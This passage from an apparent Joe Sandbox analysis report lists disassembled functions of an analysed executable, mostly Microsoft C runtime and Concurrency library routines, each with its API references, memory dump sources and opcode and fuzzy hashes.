                    • Instruction Fuzzy Hash: 84510971A04242BFEF24AF66DC40A6E77A4EF01315F24416FEB10972A1EB72B541CB62
                    Function 0043EB31 Relevance: 12.2, APIs: 8, Instructions: 203COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$___from_strstr_to_strchr
                    • String ID:
                    • API String ID: 3409252457-0
                    • Opcode ID: 27eb51fbf8e6376bb8481d9dbec84d3bad0ef45d2e19943ccba9b84d58cff388
                    • Instruction ID: e6aeac42739e6ab7cd66bc4c883525bdaa8889de24cd7337cf9c056b5eacb4ab
                    • Opcode Fuzzy Hash: 27eb51fbf8e6376bb8481d9dbec84d3bad0ef45d2e19943ccba9b84d58cff388
                    • Instruction Fuzzy Hash: 5A514871905302AFDF21AF77C842A6E7BA4AF0D314F14616FE5209B2C1EB7D89018B5D
                    Function 00431C37 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 104threadCOMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00431C50
                      • Part of subcall function 00431F1F: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00431998), ref: 00431F2F
                    • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 00431C65
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00431C74
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00431D38
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::std::invalid_argument::invalid_argument$ExecutionFreeIdleObjectProcessorProxy::ResetRoot::SingleSuspendThreadVirtualWait
                    • String ID: pContext$switchState
                    • API String ID: 1312548968-2660820399
                    • Opcode ID: 46bbec9c4a74e2517c7a14b99cc54b57c0e90a5362bc5d5245cb815f45bf4e2b
                    • Instruction ID: 28a58a2465d583a026d35ed57488f6c87d6b755b90b9bc2941db00793719cab4
                    • Opcode Fuzzy Hash: 46bbec9c4a74e2517c7a14b99cc54b57c0e90a5362bc5d5245cb815f45bf4e2b
                    • Instruction Fuzzy Hash: 2531D835A00214ABCF04EF65C885A6E7379BF5C314F20556BED11A73A2DB78EE05CB98
                    Function 044EEB27 Relevance: 10.6, APIs: 7, Instructions: 102COMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 044EEB4F
                      • Part of subcall function 044EE8BC: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 044EE8EF
                      • Part of subcall function 044EE8BC: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 044EE911
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 044EEBCC
                    • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 044EEBD8
                    • Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 044EEBE7
                    • Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 044EEBF1
                    • Concurrency::location::_Assign.LIBCMT ref: 044EEC25
                    • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 044EEC2D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
                    • String ID:
                    • API String ID: 1924466884-0
                    • Opcode ID: 276f9df07749c2586655dd60ba68681b8fe7d142fe2824faf373aa09bfa5bba4
                    • Instruction ID: 4a261eb059207c826ab15e0d03394258bd3fd17000b31e26a7836b2fd86ecda5
                    • Opcode Fuzzy Hash: 276f9df07749c2586655dd60ba68681b8fe7d142fe2824faf373aa09bfa5bba4
                    • Instruction Fuzzy Hash: FB416C39A00214DFDF05EF66C484BAEB7B5BF48315F2480AADD499B382DB30A941CF91
                    Function 0042E8C0 Relevance: 10.6, APIs: 7, Instructions: 102COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0042E8E8
                      • Part of subcall function 0042E655: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0042E688
                      • Part of subcall function 0042E655: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0042E6AA
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0042E965
                    • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0042E971
                    • Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0042E980
                    • Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0042E98A
                    • Concurrency::location::_Assign.LIBCMT ref: 0042E9BE
                    • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0042E9C6
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
                    • String ID:
                    • API String ID: 1924466884-0
                    • Opcode ID: 276f9df07749c2586655dd60ba68681b8fe7d142fe2824faf373aa09bfa5bba4
                    • Instruction ID: 9694649e30401d41b72234d07e7418f217b5c7827242a2584a4def143e057733
                    • Opcode Fuzzy Hash: 276f9df07749c2586655dd60ba68681b8fe7d142fe2824faf373aa09bfa5bba4
                    • Instruction Fuzzy Hash: C9416B79A002149FCF04EF65D484BADB7B5FF48314F5480AAED499B382CB38AD41CB95
                    Function 0043B21D Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: api-ms-$ext-ms-
                    • API String ID: 0-537541572
                    • Opcode ID: 9abb9358dcd3ddc380508ec514d82bb73023dc79706600e3520e5c488b77e48a
                    • Instruction ID: 21de61e756f92fc94f430986694573f373faed14fbe57d2d8d79661cf7d5140c
                    • Opcode Fuzzy Hash: 9abb9358dcd3ddc380508ec514d82bb73023dc79706600e3520e5c488b77e48a
                    • Instruction Fuzzy Hash: D721D735A01714ABCB228A659C49B2F3754DF09760F2413A2FE05A73A1D738ED0086DD
                    Function 044DF1D6 Relevance: 10.6, APIs: 7, Instructions: 73COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • __EH_prolog3.LIBCMT ref: 044DF1DD
                    • _SpinWait.LIBCONCRT ref: 044DF233
                    • Concurrency::details::WaitBlock::WaitBlock.LIBCMT ref: 044DF23F
                    • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 044DF258
                    • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 044DF286
                    • Concurrency::Context::Block.LIBCONCRT ref: 044DF2A8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Wait$BlockConcurrency::details::_Lock::_Scoped_lock$Block::Concurrency::Concurrency::details::Context::H_prolog3ReaderReentrantScoped_lock::_Scoped_lock::~_SpinWriter
                    • String ID:
                    • API String ID: 1888882079-0
                    • Opcode ID: c4494c8ff7a1feda5b72c6a430cc6dcfbeaad5b25069e9d3fe1613b004dac074
                    • Instruction ID: e31bab5da97af1705a0a7a1438d2b62b90efd2a870d25c7b40b519c3c9aac380
                    • Opcode Fuzzy Hash: c4494c8ff7a1feda5b72c6a430cc6dcfbeaad5b25069e9d3fe1613b004dac074
                    • Instruction Fuzzy Hash: 93218374D002198AEF34EFA4C8656EEF7F0AF05314F60051FD162A6291EBB2A648CB91
                    Function 044FF3E5 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 044FF3AD: _free.LIBCMT ref: 044FF3D2
                    • _free.LIBCMT ref: 044FF433
                      • Part of subcall function 044FB0FC: HeapFree.KERNEL32(00000000,00000000,?,044FF3D7,?,00000000,?,?,?,044FF3FE,?,00000007,?,?,044FF800,?), ref: 044FB112
                      • Part of subcall function 044FB0FC: GetLastError.KERNEL32(?,?,044FF3D7,?,00000000,?,?,?,044FF3FE,?,00000007,?,?,044FF800,?,?), ref: 044FB124
                    • _free.LIBCMT ref: 044FF43E
                    • _free.LIBCMT ref: 044FF449
                    • _free.LIBCMT ref: 044FF49D
                    • _free.LIBCMT ref: 044FF4A8
                    • _free.LIBCMT ref: 044FF4B3
                    • _free.LIBCMT ref: 044FF4BE
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 1c92c1e39c368c871365a5fd099445d5bf14548ec3b822f22997ad0ae516ad5e
                    • Instruction ID: a51e90d269a43d1039541b0fe2c6b10ff45749c2c484b6c7e363b11b8d0050ee
                    • Opcode Fuzzy Hash: 1c92c1e39c368c871365a5fd099445d5bf14548ec3b822f22997ad0ae516ad5e
                    • Instruction Fuzzy Hash: B7111A71A40B04BAED30BBB3CC06FCB7B9CDF01704F40481BB7A966052EE65B5098651
                    Function 0043F17E Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0043F146: _free.LIBCMT ref: 0043F16B
                    • _free.LIBCMT ref: 0043F1CC
                      • Part of subcall function 0043AE95: HeapFree.KERNEL32(00000000,00000000,?,0043F170,?,00000000,?,?,?,0043F197,?,00000007,?,?,0043F599,?), ref: 0043AEAB
                      • Part of subcall function 0043AE95: GetLastError.KERNEL32(?,?,0043F170,?,00000000,?,?,?,0043F197,?,00000007,?,?,0043F599,?,?), ref: 0043AEBD
                    • _free.LIBCMT ref: 0043F1D7
                    • _free.LIBCMT ref: 0043F1E2
                    • _free.LIBCMT ref: 0043F236
                    • _free.LIBCMT ref: 0043F241
                    • _free.LIBCMT ref: 0043F24C
                    • _free.LIBCMT ref: 0043F257
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 1c92c1e39c368c871365a5fd099445d5bf14548ec3b822f22997ad0ae516ad5e
                    • Instruction ID: 534b49149ef6fe1f5aaee1d96a2c981c71fb821ccbb97e781409d237b4b487e5
                    • Opcode Fuzzy Hash: 1c92c1e39c368c871365a5fd099445d5bf14548ec3b822f22997ad0ae516ad5e
                    • Instruction Fuzzy Hash: 6811A271980B04EADA31FBB2CC47FCBB7BD5F48708F40182EB29D6A052D63CB8188655
                    Function 044DFDE8 Relevance: 10.6, APIs: 7, Instructions: 60libraryloaderCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetModuleHandleW.KERNEL32(004512B4,?,00000000,00000000,?,?,?,044E3F5D), ref: 044DFDF6
                    • GetProcAddress.KERNEL32(00000000,0045177C), ref: 044DFE04
                    • GetProcAddress.KERNEL32(00000000,00451794), ref: 044DFE12
                    • GetProcAddress.KERNEL32(00000000,004517AC), ref: 044DFE40
                    • GetLastError.KERNEL32(?,?,?,044E3F5D), ref: 044DFE5B
                    • GetLastError.KERNEL32(?,?,?,044E3F5D), ref: 044DFE67
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 044DFE7D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorHandleModule
                    • String ID:
                    • API String ID: 1654681794-0
                    • Opcode ID: a0f3c5e5be5ec83283c824c3333a3d48fed157bf3d65dbaa9a2c4c53e6ba73a8
                    • Instruction ID: da81407d3e17d7dc5198c700ae482ec3f776c76d7517841dc4e8f81b74108506
                    • Opcode Fuzzy Hash: a0f3c5e5be5ec83283c824c3333a3d48fed157bf3d65dbaa9a2c4c53e6ba73a8
                    • Instruction Fuzzy Hash: 57018C35500715ABBB107BB6BC59F7B37ACAD04756714053BF902D12A3EEB8F4084769
                    Function 044D70B7 Relevance: 9.3, APIs: 6, Instructions: 336COMMON
                    Download Yara Rule
                    APIs
                    • __Mtx_unlock.LIBCPMT ref: 044D7188
                    • std::_Rethrow_future_exception.LIBCPMT ref: 044D71D9
                    • std::_Rethrow_future_exception.LIBCPMT ref: 044D71E9
                    • __Mtx_unlock.LIBCPMT ref: 044D728C
                    • __Mtx_unlock.LIBCPMT ref: 044D7392
                    • __Mtx_unlock.LIBCPMT ref: 044D73CD
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_unlock$Rethrow_future_exceptionstd::_
                    • String ID:
                    • API String ID: 1997747980-0
                    • Opcode ID: aafa17d89b413720177f5b6f69086235258c7d952ed9bf80c33937c13f891e8a
                    • Instruction ID: 21fed4668c6c5810863861bcdac14c39476edbbe1ef2ad5a9eae2d7ab512cf86
                    • Opcode Fuzzy Hash: aafa17d89b413720177f5b6f69086235258c7d952ed9bf80c33937c13f891e8a
                    • Instruction Fuzzy Hash: 8DC19D719002449BEF21DFA5C964BAFBBA8AF05308F04456FE81697782EB75B904CB61
                    Function 00416E50 Relevance: 9.3, APIs: 6, Instructions: 336COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0041C7BC: mtx_do_lock.LIBCPMT ref: 0041C7C4
                    • __Mtx_unlock.LIBCPMT ref: 00416F21
                    • std::_Rethrow_future_exception.LIBCPMT ref: 00416F72
                    • std::_Rethrow_future_exception.LIBCPMT ref: 00416F82
                    • __Mtx_unlock.LIBCPMT ref: 00417025
                    • __Mtx_unlock.LIBCPMT ref: 0041712B
                    • __Mtx_unlock.LIBCPMT ref: 00417166
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_unlock$Rethrow_future_exceptionstd::_$mtx_do_lock
                    • String ID:
                    • API String ID: 95294986-0
                    • Opcode ID: 39c911b2a8a9e049dca101b223586876e9297667e17adb2483760015ee0286f2
                    • Instruction ID: 57ef224f82db242419d5894fb4a60db898c918c1b4a24625dce6041fff2ac3f1
                    • Opcode Fuzzy Hash: 39c911b2a8a9e049dca101b223586876e9297667e17adb2483760015ee0286f2
                    • Instruction Fuzzy Hash: 83C1F271A043089BDB20DFB0C945BEBBBF4AF05304F10456FE81693782EB79A984CB59
                    Function 044FFFC9 Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetConsoleCP.KERNEL32(?,044C89D7,00000000), ref: 04500011
                    • __fassign.LIBCMT ref: 045001F0
                    • __fassign.LIBCMT ref: 0450020D
                    • WriteFile.KERNEL32(?,044C89D7,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04500255
                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 04500295
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 04500341
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileWrite__fassign$ConsoleErrorLast
                    • String ID:
                    • API String ID: 4031098158-0
                    • Opcode ID: 8530c6ceefdeccb30471b16bb60c9c51f20c6026f3536671e5578c65a8ea39d2
                    • Instruction ID: 42a97f661f06742a109aee5c89802768f56550a5af893295f010b98bfced19dc
                    • Opcode Fuzzy Hash: 8530c6ceefdeccb30471b16bb60c9c51f20c6026f3536671e5578c65a8ea39d2
                    • Instruction Fuzzy Hash: D2D1C275D002599FDF15CFE8E880AEDBBB5FF48314F18416AE855BB281E730A942DB50
                    Function 0043FD62 Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetConsoleCP.KERNEL32(?,00408770,00000000), ref: 0043FDAA
                    • __fassign.LIBCMT ref: 0043FF89
                    • __fassign.LIBCMT ref: 0043FFA6
                    • WriteFile.KERNEL32(?,00408770,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0043FFEE
                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0044002E
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004400DA
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileWrite__fassign$ConsoleErrorLast
                    • String ID:
                    • API String ID: 4031098158-0
                    • Opcode ID: 328b6fc5b7b9e76dfecc23fb13fe5e5030f7e5522c56b44235f2e1bbc2c421c9
                    • Instruction ID: 5c7093ca26383f089595d5279c1be1ab1822dbd5e540b6b74e9a9434c58314bd
                    • Opcode Fuzzy Hash: 328b6fc5b7b9e76dfecc23fb13fe5e5030f7e5522c56b44235f2e1bbc2c421c9
                    • Instruction Fuzzy Hash: 2ED1CD71D002589FDF15CFA8D880AEEBBB5BF49304F28416AE855FB342D635AD06CB58
                    Function 044EEC55 Relevance: 9.1, APIs: 6, Instructions: 117COMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::location::_Assign.LIBCMT ref: 044EEC96
                    • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 044EEC9E
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 044EECC8
                    • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 044EECD1
                    • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 044EED54
                    • Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 044EED5C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::Context$Base::$GroupInternalScheduleSegment$AssignAvailableConcurrency::location::_DeferredEventMakeProcessor::ReleaseRunnableSchedulerTraceVirtual
                    • String ID:
                    • API String ID: 3929269971-0
                    • Opcode ID: 49b25dfba4231d1092d72907a374f8640d08d95162733754a91ae26f54d6caf0
                    • Instruction ID: b04ff3b729f6daa25a328925403cde61ec0f92a3bd9b8fadabed06a48426827d
                    • Opcode Fuzzy Hash: 49b25dfba4231d1092d72907a374f8640d08d95162733754a91ae26f54d6caf0
                    • Instruction Fuzzy Hash: E1412B79A00619ABDF09DF66C454A7DB7B5FF88316F10816AE406AB791CB34FE01CB81
                    Function 0042E9EE Relevance: 9.1, APIs: 6, Instructions: 117COMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::location::_Assign.LIBCMT ref: 0042EA2F
                    • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0042EA37
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0042EA61
                    • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0042EA6A
                    • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0042EAED
                    • Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 0042EAF5
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::Context$Base::$GroupInternalScheduleSegment$AssignAvailableConcurrency::location::_DeferredEventMakeProcessor::ReleaseRunnableSchedulerTraceVirtual
                    • String ID:
                    • API String ID: 3929269971-0
                    • Opcode ID: 49b25dfba4231d1092d72907a374f8640d08d95162733754a91ae26f54d6caf0
                    • Instruction ID: 1f3a1950eff8c09013561670095c22540fa8b87dd5baeeb1554441bdcab44dd9
                    • Opcode Fuzzy Hash: 49b25dfba4231d1092d72907a374f8640d08d95162733754a91ae26f54d6caf0
                    • Instruction Fuzzy Hash: 4A418339B00619AFCF08DF65D454AADBBB5FF48310F40815AE406A7391CB74AD01CF85
                    Function 0041EDF6 Relevance: 9.1, APIs: 6, Instructions: 101COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • __EH_prolog3_GS.LIBCMT ref: 0041EDFD
                    • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0041EE27
                      • Part of subcall function 0041F4ED: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 0041F50A
                    • __alloca_probe_16.LIBCMT ref: 0041EE63
                    • Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 0041EEA4
                    • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0041EED6
                    • __freea.LIBCMT ref: 0041EEFC
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::_Lock::_Scoped_lock$Acquire_lockConcurrency::critical_section::_Concurrency::details::EventH_prolog3_Node::ReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter__alloca_probe_16__freea
                    • String ID:
                    • API String ID: 1319684358-0
                    • Opcode ID: 065b2a76bedeac6d7b0caae837de43f98596e46d9f7352f7a3cb0c113a84db58
                    • Instruction ID: 07282ca70093aa5fae6e1acffc276a069bf1d2a43c8646ebc404eb48b5e248eb
                    • Opcode Fuzzy Hash: 065b2a76bedeac6d7b0caae837de43f98596e46d9f7352f7a3cb0c113a84db58
                    • Instruction Fuzzy Hash: 14319075A002058FDB14DFAAC9415EEB7F5AF08314F24406FE805E7351DB389E86CBA9
                    Function 044EA39D Relevance: 9.1, APIs: 6, Instructions: 73threadCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 044EA3E0
                      • Part of subcall function 044EB8D7: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCONCRT ref: 044EB926
                    • GetCurrentThread.KERNEL32 ref: 044EA3EA
                    • Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 044EA3F6
                      • Part of subcall function 044E06FF: Concurrency::details::platform::__GetThreadGroupAffinity.LIBCONCRT ref: 044E0711
                      • Part of subcall function 044E0B8B: Concurrency::details::platform::__SetThreadGroupAffinity.LIBCONCRT ref: 044E0B92
                    • Concurrency::details::SchedulerProxy::IncrementCoreSubscription.LIBCONCRT ref: 044EA439
                      • Part of subcall function 044EB889: SetEvent.KERNEL32(?,?,044EA43E,044EB1D2,00000000,?,00000000,044EB1D2,00000004,044EB87E,?,00000000,?,?,00000000), ref: 044EB8CD
                    • Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 044EA442
                      • Part of subcall function 044EAEB8: __EH_prolog3.LIBCMT ref: 044EAEBF
                      • Part of subcall function 044EAEB8: List.LIBCONCRT ref: 044EAEEE
                    • Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 044EA452
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Proxy::Scheduler$AffinityThread$Concurrency::details::platform::__CoreCurrentExecutionGroupHardwareIncrement$Affinity::BorrowedCountEventFixedH_prolog3ListResourceResource::StateSubscriptionToggle
                    • String ID:
                    • API String ID: 2908504212-0
                    • Opcode ID: e8a399636c21c93f54abecb38cd00bd2a0cdd3abe99d6541657663b6aa6b27b5
                    • Instruction ID: e2fe48c555100365415a79d1f93463aa0237ebfb4e4fa0c432cf6fb6caa63f8e
                    • Opcode Fuzzy Hash: e8a399636c21c93f54abecb38cd00bd2a0cdd3abe99d6541657663b6aa6b27b5
                    • Instruction Fuzzy Hash: 4821D931900B109FDF25EF66C9908BBB3F8FF48209700491EE942A7761DB70B805CBA1
                    Function 0042A136 Relevance: 9.1, APIs: 6, Instructions: 73threadCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 0042A179
                      • Part of subcall function 0042B670: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCONCRT ref: 0042B6BF
                    • GetCurrentThread.KERNEL32 ref: 0042A183
                    • Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 0042A18F
                      • Part of subcall function 00420498: Concurrency::details::platform::__GetThreadGroupAffinity.LIBCONCRT ref: 004204AA
                      • Part of subcall function 00420924: Concurrency::details::platform::__SetThreadGroupAffinity.LIBCONCRT ref: 0042092B
                    • Concurrency::details::SchedulerProxy::IncrementCoreSubscription.LIBCONCRT ref: 0042A1D2
                      • Part of subcall function 0042B622: SetEvent.KERNEL32(?,?,0042A1D7,0042AF6B,00000000,?,00000000,0042AF6B,00000004,0042B617,?,00000000,?,?,00000000), ref: 0042B666
                    • Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 0042A1DB
                      • Part of subcall function 0042AC51: List.LIBCONCRT ref: 0042AC87
                    • Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 0042A1EB
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
